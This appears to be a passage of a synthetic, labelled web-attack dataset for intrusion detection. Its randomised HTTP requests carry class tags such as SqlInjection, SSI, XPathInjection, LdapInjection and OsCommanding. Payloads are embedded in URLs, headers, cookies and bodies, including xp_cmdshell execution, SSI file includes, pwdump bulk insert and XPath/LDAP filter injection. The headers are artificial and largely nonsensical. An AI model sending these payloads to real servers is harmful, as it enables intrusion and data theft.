If-Modified-Since: Mon, 24 Sep 07 08:01:16 GMT
If-Unmodified-Since: Fri, 12 Jun 09 08:20:36 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5392
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: NTLM b2NpT2hvcW1vN2ljcXB0Z25oZXNzbUVvN2Vpc2FFcmRBc2RuaFQ=
Authorization: snkh Atedst=vdsleg
Range: 32-61,4386-85
Referer: http://www.Snudis.it/hlzh93c/ifeT.tar.gz
TE: trailers
Trailer: Referer
User-Agent: Mozilla/2.6 (X11; U; Solaris 9.4; ow-qn; rv:4.5.0) Gecko/45090658
UA-CPU: MIPS
UA-Disp: 777,376,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 2941x889
Via: aeewe/9.8 92.169.43.6, 6.1 www.lonZ.css:5209
Transfer-Encoding: gzip
Upgrade: kqj/8.1, ydnbd/4.5, 5cs/8.0, hcilT/8.3, 4abi/5.9
Warning: 149 77.181.7.29:346 "s7ap2mhklltrMwto2" "Wed, 09 Aug 06 21:48:51 CET"
X-Forwarded-For: 106.96.131.159
X-Serial-Number: 521013041943
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43500
Start - Id: 43788
class: OsCommanding
GET /ssi/envout.bat?|dir%20..............1 HTTP/1.0
Host: 232.100.49.110
Connection: Erlirsi
Accept: image/jpeg, audio/*;q=0.8, image/jpeg;q=0.4
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=34
Client-ip: 239.143.8.35
Cookie: bgin7im=asl"apacsdrop"atO/ 
Cookie2: $Version="730"
Date: Mon, 31 Dec 07 19:41:23 CET
ETag: W/"AMC5ZOlrnU7y1Mew"
Expect: 100-continue
From: qto7read@r8owxth.de
If-Modified-Since: Sun, 30 Mar 08 11:56:33 UTC
If-Unmodified-Since: Mon, 02 Feb 04 23:52:49 UTC
If-Match: ".SZXlk0tUSsOQGtXMRc"
If-None-Match: "X0vDchMuUzzbLnZ"
If-Range: Thu, 28 Apr 05 19:22:49 CET
Max-Forwards: 6908
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: NTLM ZmxlYXN1dXJhYU12b25ob25mQm5JYWVzbHR0bmlhYXNoNnVyZw==
Authorization: pTeest obeyj=ge1a
Range: 904036-,02113-35,44499-
Referer: http://www.68esa.uk/kceT/RriO5tai.php3
TE: trailers
Trailer: Pragma
User-Agent: mwhtiNovriIR
UA-CPU: Sparc
UA-Disp: 911,7505,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 154x454
Via: HTTP/2.5 181.197.68.245, FTP/3.5 www.edewa.css
Transfer-Encoding: identity
Upgrade: tEYegn/9.0, l5aur/2.0, tbef/0.2, 8mru/4.2, Nsq/6.6
Warning: 848 www.ellxsil2.jpg "n5rnlcviw" "Wed, 23 Mar 05 14:33:15 GMT"
X-Forwarded-For: 203.135.237.55
X-Serial-Number: 11781143207905764900
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 43788
Start - Id: 48562
class: XPathInjection
POST /aI/kDgmte/4gBPoSJ5GQ-C_PImrmWh/oBsd8zThHI/otkOlibnUqzrLidMscriptq/n1XwYJu2dL@P8D.png? HTTP/1.0
Content-Length: 368
Content-Language: aetdn
Content-Encoding: gzip
Content-Location: /egceets/0ie24nhs/odaThi.doc
Content-MD5: dWF6b2dpbmV0dGVtaGY0dA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 09 Oct 08 18:11:54 UTC
Last-Modified: Wed, 17 Feb 10 22:50:34 UTC
Host: 163.31.11.40
Connection: close
Accept: application/x-tar, video/*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: thno-iafd9;q=0.4, ot3oaeu-ae, eHab6lik-4n;q=0.2, bnsdhjts-Ihdh;q=0.7, k0c-cetucr
Cache-Control: only-if-cached
Client-ip: 174.93.187.45
Cookie: uipp=368043
Cookie2: $Version="8"
Date: Sat, 02 Oct 04 03:47:07 CET
ETag: W/".NpEoPMJ922d-Z-plN"
Expect: olaslnwd=eMwneuh;iodg7=mroae
From: w3nw@eoeld2.be
If-Modified-Since: Tue, 15 Mar 05 07:31:51 UTC
If-Unmodified-Since: Tue, 02 Aug 05 17:59:54 GMT
If-Match: "Z6c43SIzfP2qH58GinIm"
If-None-Match: *
If-Range: Mon, 26 Jan 04 02:24:41 UTC
Max-Forwards: 563
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: siue bdclebse=ssaui
Authorization: Basic dHJpb2RjOmNhaExoc2Vh
Range: -99
Referer: http://wa0s.org/okTv/Rsssda/0n6iin/ecee/rha2DllO.swf
TE: chunked;q=0.7
Trailer: Authorization
User-Agent: qettDmOei/3.5
UA-CPU: StrongARM
UA-Disp: 488,4156,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 0026x0337
Via: xrsrn/5.6 200.13.205.9
Transfer-Encoding: nhRze
Upgrade: tht3/1.7, Wquod/3.6, gppbhH/7.6, oiu/0.5
Warning: 651 www.filmtc.css "8HFtmshdumhqpyai" 
X-Forwarded-For: 60.213.229.203
X-Serial-Number: 63432598525498098
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

o2p1bh9t=?maa=a teishutdownO&tni=ebn&dOnUdevEm=cino&xabmarrwitUon=ydpt8H&S1BbXx_T=hHMx&ebREa=1l5c&sot82nla=77170&jJKtemeta0avL=mfhci/no9/a7huq0/child::node()[    position()=4]  |    hi/seo/ysyt/child::text()[position()=615] or  'xp'  =   '&so3eonoeiseyjth=1ywiectnxtermtloghiewna&mN4rgnnhT=sLY&-lbnq_bwSE=3

End - Id: 48562
Start - Id: 39578
class: SSI
POST /v-3xsE/ecYv2J6@haMh_Gg/wV_U/onYi3x/auMnJ4HMxhL7ZUZ./s5a27v/qgPIMYA-/r67Jf@JYJYRv/TeZG.9fm/hrY4x/dena8hnor.jpg? HTTP/1.0
Content-Length: 273
Content-Language: 0eiiec,hucneL
Content-Encoding: deflate
Content-Location: /onro/fnecedr/4snNii4/5anp.dll
Content-MD5: ZU93bGdhZHJ0Zm5wQXloaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 21 Nov 06 23:15:18 GMT
Last-Modified: Fri, 18 Feb 05 19:22:42 UTC
Host: www.Awoto.gov
Connection: keep-alive
Accept: image/*, video/quicktime;q=0.6
Accept-Charset: iso-8859-2, x-mac-ce;q=0.6, euc-kr, windows-1255;q=0.5
Accept-Encoding: *;q=0.5
Accept-Language: ohaVb-lhuke, euoi1Ia-ae;q=0.8, tjnX-vuen;q=0.2, a3w-nede;q=0.2, spniofso-vhsImnr;q=0.6
Cache-Control: agbnne4='rzigaI'
Client-ip: 145.102.168.110
Cookie: uwa5XWfOiwaBl2=jtphpo ;b1oPrbnEel=h7x;mYQrinb=uarm4znooiAtS
Cookie2: $Version="0"
Date: Tue, 06 Oct 09 17:04:10 UTC
ETag: "E-DjyT8l5_1VDtzNt-o"
Expect: t7ug=t2ana;oee3=fmtY
If-Modified-Since: Sat, 30 Jun 07 04:17:02 UTC
If-Unmodified-Since: Mon, 28 Dec 09 12:37:24 UTC
If-Match: "vaPI5oNz_OoK-V5DD"
If-None-Match: *
Max-Forwards: 38
Pragma: no-cache
Authorization: NTLM a2RkZHVoZ2V0RWF0ZWhpN25jaXV0c280aUVvZ29wbDJvaW50bGdMYWtlcW9u
Referer: /yheeeo/awhat.asmx
TE: trailers,gzip;q=0.4
Trailer: Host
User-Agent: Mozilla/7.0 (Windows; U; WinNT 4.4; bm-yS; rv:7.7.6) Gecko/71188482
UA-CPU: x86
UA-OS: Windows 98
Via: 1.4 147.201.129.5, 6.7 42.203.74.130, FTP/6.8 www.coGgsodh.htm
Transfer-Encoding: compress
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

7aoh7ia=y9Oy5XY8So8&Bshs7YoaxzhTjmb=uilh\se\3]formee&@h&i9eeEh=etmpi mrmr&ietN=<!--     #include  virtual="/var/log/httpd/access.log"   -->&5aqegtnr=1z0wuPKt&MZ0H3bL=lEjnewinntsate)&8o3tlK7noniha=eOllasic&eaz=27526887&IJW9.M=lxtEahn2\hah

End - Id: 39578
Start - Id: 42666
class: SqlInjection
GET /nHc1GSDoxvO9r_./rtaa0eaam/dirun/eic.htm?M.a58F=+bH&s6am0tas=%2F2fo+0%3C+lne+t+%2Feg%7C&rzlhc0=77464&vxPEy=os%40%2F&nbemuzrrsiienap=550&Y4harto=67%5CtxtermvPr1&tcesS7camon=09717&dSU@R3r9u=N&fdiz8ijubD=3&dGMmtafo=tr&mfmboime1eem=cwnXf&WwPVlinklog=%27select++++customer_phone++%27%7C%7C%27from+customers+++++%27%7C%7C%27where+++customer_surname%3D%27%27%27%7C%7C+++lv_surname%7C%7C%27%27%27+and+++customer_type%3D1%27%3B&NSfxFqjn-xp_Z8=1&rt4ijtQuN=zyemb&N0at56v=96 HTTP/1.1
Host: www.Sttide.gov
Connection: close
Accept: application/zip;q=0.2
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 179.202.66.201
Cookie: Xc4toH2h=iz7gC1v;rmaat3=rz;yetom2=w5Xerv.SaO;eEsfnrnzaua= )pjtmp;d0aIrmfhLtYYx=nrSoMmeytnzbni
Cookie2: $Version="1"
Date: Tue, 30 Sep 08 15:59:09 GMT
ETag: W/"uROPmH-wt_Abq65K3"
Expect: 100-continue
If-Modified-Since: Wed, 03 Sep 08 22:08:14 UTC
If-Unmodified-Since: Tue, 22 Jul 08 20:22:13 CET
If-Match: *
If-None-Match: "fDqJA1m8kiyP_FwVEo"
If-Range: "WqqhlTpo7fph2PGa1Eu"
Max-Forwards: 770
MIME-Version: 8.1
Pragma: 8l=eoidoce
Proxy-Authorization: Basic eWFlckVMOnI3NHRu
Authorization: Basic NzJveG5hdGc6TlJ2bnJj
Referer: http://sn1po.cz/iehhEg/os98E/rtnwe.doc
TE: chunked;q=0.8,deflate;q=0.0
User-Agent: oiasotMsnrR8uDrnI
UA-CPU: Sparc
UA-OS: Windows 98
UA-Color: color32
Via: 9.8 www.ijuec.jpeg
Transfer-Encoding: compress
Upgrade: eeog/2.4, mitts/3.0, e6e3i/4.3, oaelt/5.7, heNtCn/4.2
Warning: 783 www.chvaonf.html "Tvnj8wlTdlch3nhl" "Mon, 08 Mar 04 04:17:40 CET"
X-Forwarded-For: 113.84.223.129
X-Serial-Number: 328822
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42666
Start - Id: 38595
class: LdapInjection
GET /tq1jnZZAA19NOvv/tErqahuengaLg4/2wkt/onoxSetTenqe/opTba5eBe/fhpPtcdcn/b7bfU_2j1T/7vpornnA/o1/taf3f6gn/-Wi6likereplaceMx0/mjada.asp?64a=wkZ988h&Zetey=98%29%28%26%28objectClass%3D4sfo%29%28%7C%28sn++%3D++++ca%29%28cn%3DgfT+++++J*%29%29&W@T8=eoopenN&ooi=7af&sthsugnroHien=e&tshiodseh=7367&oexdphuecnd=document%7Ccho5t%3F%2Bsboot.inis&niUeaaELnodFa=bpd%29ies&bkelen2ME=fb7aderepornaaiy&M1bzt4Js.j=608979&fTmCUMIot=mrm&rowllphcrTpea=%2FAncoptg&zsea9urmjrz=t4jtauo3&IiMaa=tgc%5Cew4ahreade%25aeedf&XRHxp_6ynS=61692 HTTP/1.0
Host: www.oefr.net
Connection: close
Accept: image/gif;q=0.7, text/plain, application/postscript;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: naor-lkne, d5ace4vs-yy;q=0.4, eku-te;q=0.7
Cache-Control: no-transform
Client-ip: 207.150.239.164
Cookie: rtu4sdeelqsrirn=ttac;nppavobhedIaA3=8552784
Cookie2: $Version="7"
Date: Tue, 12 Jul 05 18:24:44 GMT
ETag: W/"O.bTOUSMU2LLu9X"
Expect: 0saert
From: Henr0sl4@nexht.fr
If-Modified-Since: Fri, 05 Mar 10 21:06:24 CET
If-Unmodified-Since: Fri, 03 Dec 04 18:33:05 GMT
If-Match: *
If-None-Match: *
If-Range: "pZVR79bHYtj91B14"
Max-Forwards: 3210
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: Digest cnonce="0Nnzylmx"
Authorization: NTLM ZGFyVHN0MWxpYW5nZWxpcDBuc3JyYWZldGV5aWJhbDVuZWQ=
Range: -348176
Referer: /54th/3gog/eaftht4/ehnly7/iodOy.rar
TE: trailers,trailers,trailers
Trailer: If-Range
User-Agent: ptfzdx/1.9.7.3.3
UA-CPU: 68000
UA-Disp: 9162,3647,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2971x6869
Via: 7.6 www.asExau.htm, 5.7 www.ttLeolon.jpg
Transfer-Encoding: identity
Upgrade: o9ttnl/4.2, 5tnn/9.6, rmt/0.6
Warning: 619 187.93.166.222 "etLesebuo9iioii" 
X-Forwarded-For: 248.9.49.144
X-Serial-Number: 379109696738614
----: --------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 38595
Start - Id: 41083
class: SqlInjection
GET /r_QvN7YqvHEmtjs8FcZ/aaipirnret7hQkofe/Tisapiihsho/emlxesbpsoesbobtdll/i_rnBwfaXSbo0Hn/7MFimvzehHc6xitana/catDOhtaccesq6dropW/oteerevn9iewArtwdIl/waffNi/0arHM6TNARUO18i/L4_8pR-/lswear7.js?7bsh0dde4O=ysewothss7tntotn&4b=46&lpecaoeaaehi=tULs13EWtB&etoruseoe=uV3Y8JcEQ-l&J2OSK=nseasns1ka&1SlTSolilta8rS4=iehteB&e2e2tglqbyel6hV=ioseR&yXlN5u=arrtit&Zfco70=uexecashutdownp&leepneTd=i%3D+r&dEn4ilmmisui=hl%2Fdsam&bservicesZSDGL=hLwEem&aceY7=exec+++++xp_cmdshell+++%27%22hhim%22++++%3E%3E+script.vbs%27 HTTP/1.0
Host: 175.11.86.27:80
Connection: close
Accept: audio/*;q=0.8, text/*, application/*
Accept-Charset: x-mac-japanese;q=0.9, windows-1255
Accept-Encoding: identity;q=0.8, compress;q=0.0, identity
Accept-Language: lsetttmc-lstfsex, s3n-1uoReOa;q=0.0, h5tls-eo7, Wxsuelhr-7c5Ydoat
Cache-Control: no-cache
Client-ip: 183.139.157.162
Cookie: i8i=nnsoror$%document]hB;2tt5=uf8I;@C8Q=mrl.NzzK;9D4positionpEU=dTGtK_;a6h=2080;53betweenunullqIwindow.open=4698369279
Cookie2: $Version="949"
Date: Mon, 27 Jun 05 21:50:23 CET
ETag: "Xg@@-_KEAdcBHV47NM"
Expect: todx=mj6wd7;rmdo
From: ttytsmgz@lbtfnlH.de
If-Modified-Since: Fri, 05 Nov 04 18:58:00 GMT
If-Unmodified-Since: Mon, 16 Jan 06 13:54:23 UTC
If-Match: "tHW-C8o-m99bI8N"
If-None-Match: "aRXBru0w8uSbkRYDvhx"
If-Range: Wed, 18 Nov 09 08:08:09 GMT
Max-Forwards: 5
MIME-Version: 7.6
Pragma: oltcia='goBi'
Proxy-Authorization: Digest username="seeg"
Authorization: Basic ZWVkbkg6dnNyYTliZDc=
Range: 000-,-068966
Referer: /boe4/ncaagm.htm
TE: trailers,chunked;q=0.1
Trailer: From
User-Agent: Mozilla/7.8 (compatible; MSIE 8.9; SunOS sun4u; HIZmmio; a5iolljti; 0tir)
UA-CPU: Sparc
UA-Disp: 2063,773,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 194x0684
Via: HTTP/5.1 www.nHxnaz.jpg:262
Transfer-Encoding: sdot
Upgrade: Nb5/4.4, 2oss/0.9, ienmha/5.2, paie/0.1, sMat/4.9
Warning: 604 www.hKNbdI.gif "crapaattI" "Thu, 10 Jun 04 12:26:14 UTC"
X-Forwarded-For: 110.167.165.101
X-Serial-Number: 54708069609443708
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41083
Start - Id: 49120
class: XPathInjection
GET /cA/positionzwZHaMN/oGrhttp@X/jkyBPYD/igozpO0OtRe3SFcoIT.shtml?emy8=Ioegselect&wuesaK7gt=f&insertF4Eq-J4H=nr%26e%2F%5CeoATraerxrol&oniDwieharnhe=bore%2Fdh%2FoaQg2e%2Fchild%3A%3Anode%28%29%5B++position%28%29%3D523%5D+++%7C++ni%2Fss7a7E%2Ftoenn%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D0%5D++++or++++%27eoMre%27%3D+%27 HTTP/1.0
Host: www.tahuas.be
Connection: oTemst
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.9
Cache-Control: min-fresh=84
Client-ip: 206.17.245.211
Cookie: wfoo3bt6k=27
Cookie2: $Version="259"
Date: Tue, 26 Jan 10 06:17:23 GMT
ETag: "vPp0o9iOZjK@583"
Expect: 100-continue
From: tiaecs@atrtrnsru.ch
If-Modified-Since: Wed, 15 Dec 04 14:24:17 UTC
If-Unmodified-Since: Sun, 09 Oct 05 14:08:05 GMT
If-Match: "fKYBCvbJeO8B1QXb2Q@x"
If-None-Match: "Zh@aEsWWy7n@MfvHPIZ"
If-Range: *
Max-Forwards: 303
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: Basic b3JhZmEwdDplb3FyYXQ=
Range: 1-
Referer: /xpmfle/3lSelheb/lddo3a3.jsp
TE: chunked,chunked;q=0.2,trailers
Trailer: Referer
User-Agent: abnyN/5.1.9.7
UA-CPU: StrongARM
UA-Disp: 3801,296,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 9298x371
Via: 9.4 105.145.37.4:8818, HTTP/3.1 67.67.54.173, 1.6 www.EasavI.png
Transfer-Encoding: compress
Upgrade: enn72/7.1, EYeuT/2.5, saodes/7.2
Warning: 244 www.vcyjee.gif "iretosra" "Tue, 22 Jun 04 04:39:25 CET"
X-Forwarded-For: 91.195.205.35
X-Serial-Number: 68685203672775561
----: -------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 49120
Start - Id: 41161
class: SqlInjection
POST /tA8Q_Jte.6A92YIGk3/tfeA8ptaexn1/oRS7-w7ZB/tisfdTroiit/cshrwaThr7t/ikci4e/gU6OooMT2ri2@AQ/toiRrbjljbe9/rehelhsteyyrjrer.bin? HTTP/1.1
Content-Length: 203
Content-Language: mlo,scrnR
Content-Encoding: compress
Content-Location: http://www.tLo5tite.cz/taoEwyoo/sdaa/aartl.tiff
Content-MD5: M2VtczBnNmRlcHJVdWFONg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 05 Dec 05 18:22:02 GMT
Last-Modified: Sat, 08 May 04 24:05:51 UTC
Host: www.a79id.st
Connection: aeenwiet
Accept: application/*, application/*;q=0.6
Accept-Charset: iso-8859-8;q=0.1, euc-tw;q=0.3, windows-1251
Accept-Encoding: *
Accept-Language: bulk   insert  mwba     from 'pwdump.exe'         with    (codepage='RAW' )
Cache-Control: rsEona='eljl1Bn'
Client-ip: 195.29.238.110
Cookie2: $Version="0"
Date: Tue, 23 Dec 08 10:42:22 CET
Expect: 100-continue
If-None-Match: "Y4FT4GSz7RekW-X"
If-Range: *
Max-Forwards: 80
Pragma: no-cache
Range: 921301-
Referer: http://byrof.ch/fIsmett/y2rTpl.jpeg
User-Agent: ey7wcm9m
UA-OS: Windows 95
Via: 6.5 244.114.208.252, tamfm/4.2 177.183.161.95, 6.7 www.tmatrt.html

uIrimlBrthr=pE.X&sqG=ee5sadn;zf:&saradtosb=dosnwync&cm8der=ep&22go=dd IteaneC$5&rlfplnlcam5=Ph\@l/[2erstio&ilba=nb7ar5&nxlx=r1w&KXHP=po9hOiysutr&Ncr7oheihkhMe=629801069&eo=~fhrlnbgtskryhA

End - Id: 41161
Start - Id: 40739
class: SSI
GET /evscrseN/-MXeAZ0vbscriptsnrPHlocation/0aladminM/aslhityUelrctaevIgJt/ud/2w/txh.jpeg?vngnesrFCnx=r%2Bdslftaaumf+n&srcrge0=eta8 HTTP/1.1
Host: www.lNNagelneO.gov
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Cache-Control: max-age=2738
Cookie: 5DXDperl5g=<!--#odbc   connect="iloa,jxmsot,iusni"    statement="select   *   from     i5kmy"-->;OwmWQQ8=oNna'ydtE ci;suecveemndalep=scaehomeeo@axtermSn+;9xEfuiDIRN=ea1eo9ity5AitTsauh
Date: Sun, 19 Jul 09 07:05:44 UTC
From: aifr@9a2wazts.ch
If-None-Match: *
Max-Forwards: 5
Referer: /haekttn/H56oufZm.avi
User-Agent: Mozilla/6.1 (Windows; U; Windows NT 3.5; lt-51; rv:8.4.7) Gecko/03212498
UA-Disp: 734,522,32
----: -----------------------------------------------

null

End - Id: 40739
Start - Id: 40404
class: SSI
POST /nyaices/sFmV@CPFxNo47AEw79e4.png? HTTP/1.1
Content-Length: 287
Content-Language: h
Content-Encoding: gzip
Content-Location: /uheeoeY/thqehnp/rylsE/vrlpt.tiff
Content-MD5: bWRhdGVoYnRPaGV0aWFmdA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 28 Jan 09 11:36:59 UTC
Last-Modified: Thu, 27 May 04 02:29:59 UTC
Host: www.dnienAN3se.cz
Connection: keep-alive
Accept: video/*, image/*, video/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: max-age=824
Client-ip: 16.69.2.56
Cookie: ee0eIm=rbAiieeatelnet'l|bl
Cookie2: $Version="13"
Date: Sun, 29 Jun 08 09:42:12 UTC
ETag: "6VoYCsLVuGsywbSj0"
Expect: 100-continue
From: nvecwD@airnsvo7rs.com
If-Modified-Since: Mon, 08 Dec 08 24:17:09 CET
If-Unmodified-Since: Tue, 25 Apr 06 14:42:43 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 268
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: l4te9v tifnO=sIwmcnTg
Authorization: UaneH hnznx=yoh6
Referer: /4eenme/iaaoa/1holoare/uybi0Ela/iOlwb.jsp
TE: deflate,trailers,chunked
Trailer: If-Unmodified-Since
User-Agent: ehntf/2.6
UA-CPU: Sparc
UA-Pixels: 5480x145
Via: 8.8 www.w7ycngun.png, 0.8 55.132.48.251, 2.5 www.tasAa9.html
Transfer-Encoding: compress
Upgrade: anoNn/3.2, nnna/8.2, etrp7h/2.8
Warning: 410 www.hett9f.tiff "rlxshbn4vdigo" 
X-Forwarded-For: 55.196.49.158
X-Serial-Number: 945253
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hr=rkwPtMa8X4K2&.VrU=ictc&rotgayb=ment&oaQo=4118853&dainsowebixg=<!--   #include virtual="d:\windows\autoexec.bat" -->&4udE=691997925&hsC=4&nse6teHe=978579&UHa0O=tet?:eeaaI%&lqanceeJc=z f61o|&ueekaes=7en-netcateR\&bm-EMTcYTAH=2130751&ltAsgsm=08&O2utae=67664

End - Id: 40404
Start - Id: 48958
class: XPathInjection
GET /hieoye2rtr/sVH@/eZOOFt4zNBh6fYIViz6/2r/hishgsei1/hyhrsJe32e/deds7dleNe7ibD.tiff?ooeo=71+++++or+++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++%7C+++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or+++535%3D HTTP/1.1
Host: www.k7wwishlp.it:80
Connection: keep-alive
Accept: text/xml;q=0.6, text/*, video/mpeg;q=0.4
Accept-Charset: *
Accept-Encoding: deflate;q=0.6
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 170.112.198.15
Cookie: wtEPyy=6413396;hQxUS9eOxg=iw9
Cookie2: $Version="71"
Date: Fri, 31 Dec 04 07:07:30 UTC
ETag: "FUkp6cY6gug6IFvU"
Expect: 100-continue
From: aaee5oT@0lekntq.de
If-Modified-Since: Sun, 27 Jul 08 10:53:53 GMT
If-Unmodified-Since: Tue, 04 Sep 07 10:24:40 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 02 Apr 05 08:44:32 GMT
Max-Forwards: 91
MIME-Version: 3.9
Pragma: Te2H=s
Proxy-Authorization: 7ryrer l7Fsei=9ums
Authorization: vtaa iiuEo=syio
Range: 5-
Referer: http://hInhmtet.com/Ozeolnuc/jIa5/npihb/oRi1h78n/o1cr2nes.ace
TE: trailers,trailers,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/6.1 (Machintosh; U; Mac OS X 9.8; rA-pf; rv:3.3.6) Gecko/17184438
UA-CPU: MIPS
UA-Disp: 705,827,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 7333x919
Via: HTTP/1.6 www.l1sc.js, 9.3 112.35.172.124, 8.8 www.nRssainc.gif
Transfer-Encoding: compress
Upgrade: 6cwot3/1.9
Warning: 219 www.NUeeo.shtml "r8tNtaTA" 
X-Forwarded-For: 58.153.30.65
X-Serial-Number: 544350626543951868
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48958
Start - Id: 37676
class: LdapInjection
PUT /xvexecakQkbzqjm/vgrmrsAgbmwIlttbmyr/ttde/oomygrr/m1sDYz7mU/e1.XlDcoA9GKYv2Bf@/bs32hnn/ujxEnkkYmypBoPd07@g/ult/l952FmOgSczRQeZ/eslitdc.shtml? HTTP/1.1
Content-Length: 50
Content-Language: iy9u5n
Content-Encoding: identity
Content-Location: http://www.evZeOitn.fr/eehtt/dtxlrrVe/7et7/t3pnm.aspx
Content-MD5: ZW5hdHd1d2VZcHJhbW9ucQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 11 Aug 06 01:50:29 UTC
Last-Modified: Tue, 17 Mar 09 18:49:07 UTC
Host: 120.21.181.97:40
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: a=dfycoU
Client-ip: 71.214.180.23
Cookie: pd0eT=83879;bSLok=ahShbyee;lseZrchtsetes3=aj;WZshutdownXItxunionvHsB=ijZ;sSo3lHuttNoaHeJ=h.RIEx;t3jeoigrpemy=0995
Cookie2: $Version="613"
Date: Mon, 02 Nov 09 23:06:29 CET
ETag: "loLaNmei9ru@mP9sc@d"
Expect: eenen
From: ssDeu@yeiMt.st
If-Modified-Since: Thu, 24 Apr 08 07:53:31 GMT
If-Unmodified-Since: Sun, 22 Feb 09 18:20:10 GMT
If-Match: "fdP.5sI.R-AUru88"
If-None-Match: "gCmDnTP8Ts5Rlvd9-"
If-Range: Sat, 18 Apr 09 06:38:08 CET
Max-Forwards: 0654
MIME-Version: 8.1
Pragma: ehne7='y8ixje'
Proxy-Authorization: Digest uri=/heen1roq/eredadu/eloyue/dceeE.cgi
Authorization: Digest opaque="Lrea"
Range: 6058-6,88-,-245437
Referer: /n6ytr/yhy0u/eyZyEfk/Hhng.pl
TE: trailers
Trailer: Authorization
User-Agent: hhwhTa7oo/3.0.4
UA-CPU: MIPS
UA-Disp: 770,856,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 940x1719
Via: 8.1 160.31.218.45, 1.1 www.gcyre.gif, HTTP/4.5 208.102.198.163
Transfer-Encoding: ssmo
Upgrade: pemoEi/4.0
Warning: 638 www.testaoOo.shtml "I7qnrs9jyxsxit2" 
X-Forwarded-For: 66.23.157.210
X-Serial-Number: 7386288464563322200
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eoreebi=er/4&iiF3s=n5mi)( |(hn0oo=*)

End - Id: 37676
Start - Id: 49993
class: XPathInjection
PUT /c7hfw2.-ngI/n5g-CMMTBJzYK/a-p/hnv_-FnlJce-96gD-5/yjyz7pshtdEh6.pl? HTTP/1.0
Content-Length: 210
Content-Language: ahljme,i,wpoa7h8
Content-Encoding: deflate
Content-Location: http://www.wEaei.cz/8wmhem/lilpee/wsee97ie/u5Luk.jsp
Content-MD5: OHM2dGRjT2l0MmZrb2lVdA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 15 Jul 06 05:23:58 UTC
Last-Modified: Thu, 31 Dec 09 12:12:52 GMT
Host: 59.133.62.15
Connection: zecufn
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.2, compress;q=0.9, compress;q=0.4
Accept-Language: eei/ul/m/child::node()[position()=595]    or   '5vreou'    =  '
Cache-Control: max-stale
Client-ip: 89.188.193.205
Cookie: fh=3599108
Date: Wed, 18 Nov 09 08:22:05 GMT
ETag: "B@Z_FoQ6sHQt.m-"
Expect: aef0
From: Hrtiy@r0sqSkft.de
If-Modified-Since: Sun, 23 Jan 05 02:03:25 CET
If-Unmodified-Since: Sun, 11 Dec 05 19:38:23 GMT
If-Match: "yyz2SBTKCVsnF8MKL@"
If-None-Match: *
If-Range: "blQg3L0Ju0EECMW"
Max-Forwards: 400
MIME-Version: 2.4
Pragma: anhe8=t9eenaos
Range: 82179-,-1
Referer: http://www.1dnbaSpw.ch/o2nl/9balaAN.txt
TE: deflate,deflate;q=0.3
User-Agent: hiIsduFqt (rKULQW; r4Fmt2; eFLkvAh9NC; zHY7pgGA)
UA-CPU: x86
UA-Pixels: 957x1532
Via: FTP/9.8 191.115.53.215, 4.9 www.tsHe.js:706
Transfer-Encoding: identity
X-Serial-Number: 7920080126086879316
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

